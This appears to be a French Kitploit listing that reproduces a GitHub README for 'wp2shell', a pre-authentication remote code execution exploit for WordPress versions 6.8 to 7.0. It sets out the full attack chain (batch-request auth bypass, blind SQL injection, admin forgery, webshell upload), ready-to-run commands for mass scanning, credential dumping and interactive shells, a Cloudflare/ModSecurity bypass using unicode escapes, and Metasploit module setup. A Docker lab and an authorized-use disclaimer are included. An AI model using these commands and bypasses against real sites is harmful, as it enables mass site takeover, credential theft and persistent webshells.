Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
wp2shell-Exploit-Waf-Bypass — Exploit RCE pré-authentification WordPress + Scanner + Contournement WAF | CVE-2026-63030 + CVE-2026-60137 | Modules Go + Python + Metasploit + Laboratoire Docker | Kitploit
Outils/GitHubGitHub/m4xsec/wp2shell-exploit-waf-bypass
Scanners de Vulnérabilités WebExploitationExploitation d'Applications WebTests de Sécurité des APIContournement de WAFTests d'IntrusionRed Teaming
GitHubm4xsec/wp2shell-exploit-waf-bypass

wp2shell-Exploit-Waf-Bypass

Exploit RCE pré-authentification WordPress + Scanner + Contournement WAF | CVE-2026-63030 + CVE-2026-60137 | Modules Go + Python + Metasploit + Laboratoire Docker

Voir le dépôt
212il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
root@kitploit:~
                ___      __         ___
 _      _____  |__ \ ___/ /_  ___  / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / / 
| |/ |/ /  __// __//_  / / / /  __/ / /  
|__/|__/\___//____//__/_/ /_/\___/_/_/   
                                         
  RCE WordPress sans authentification — CVE-2026-63030 + CVE-2026-60137
  par Venexy (M4xSec)

GitHub Release License: MIT Go Metasploit

Exécution de code à distance sans authentification sur WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1. Corrigé dans les versions 6.8.6, 6.9.5, 7.0.2.

Installation rapide

root@kitploit:~
# Pre-compiled binary (fastest)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell

# Or build from source
go build -o wp2shell go-scanner/wp2shell-master.go

Chaîne d'attaque

  1. Confusion de routage via des requêtes batch imbriquées avec un chemin d'amorce invalide contourne l'authentification
  2. SQLi aveugle basée sur le temps extrait le préfixe de table, l'ID admin et les identifiants
  3. La falsification de lignes basée sur UNION injecte les caches oEmbed (SQLi en lecture seule → écritures en base de données)
  4. Élévation de changeset + parse_request() réentrant forge un administrateur
  5. Le téléversement d'un plugin déploie un webshell auto-nettoyant
  6. Exécution de commandes et nettoyage automatique

Outils

Scanner Go (go-scanner/wp2shell-master.go)

Binaire tout-en-un — scan, vérification, lecture, exploitation, shell interactif.

root@kitploit:~
go build -o wp2shell-master go-scanner/wp2shell-master.go

# Mass scan
./wp2shell-master scan -f targets.txt -j -t 20

# Confirm SQLi
./wp2shell-master check https://target.com --waf --delay 3.0

# Extract admin creds
./wp2shell-master read https://target.com --preset users

# Pre-auth RCE (no password needed)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth

# Interactive shell
./wp2shell-master rce https://target.com -i -y

Outils de contournement WAF (waf-bypass/)

Scripts autonomes pour contourner Cloudflare/ModSecurity via l'échappement unicode JSON des mots-clés SQL.

  • core.py — Moteur SQLi aveugle partagé avec contournement WAF
  • dump_version.py — Extraire @@version
  • dump_dbname.py — Extraire DATABASE()
  • dump_tables.py — Énumérer les tables
  • dump_columns.py — Énumérer les colonnes
  • rce_shell.py — Chaîne RCE complète avec contournement WAF

Modules Metasploit (metasploit-modules/)

  • wp2shell_rce.rb — Module d'exploitation RCE complet (PR #21760)
  • wp2shell_scanner.rb — Scanner non destructif (PR #21761)

Installation locale :

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb

Technique de contournement WAF

Le WAF Cloudflare inspecte les octets JSON bruts mais ne décode pas les séquences d'échappement \uXXXX avant la correspondance de motifs. Le json_decode() PHP de WordPress les décode de manière transparente.

  • SLEEP → SLEEP — contourne la détection de mots-clés
  • Amorce à deux-points (: au lieu de http://:) — plus court, évite les règles de motif URI
  • Chemin permanent /wp-json/batch/v1 — évite le blocage de ?rest_route=
  • En-têtes Origin + Referer du domaine cible — satisfait les vérifications CORS/même origine

Lab Docker

Lab sans WAF (port 8888)

root@kitploit:~
cd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!

Lab WAF (port 9999)

ModSecurity CRS (OWASP) avec règles de type Cloudflare — contournement unicode confirmé.

root@kitploit:~
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999

Avertissement

Cet outil est réservé aux tests de sécurité autorisés. Utilisez-le uniquement sur des systèmes qui vous appartiennent ou pour lesquels vous avez une autorisation écrite explicite. Tout accès non autorisé est illégal.

Licence

MIT

Télécharger l’outil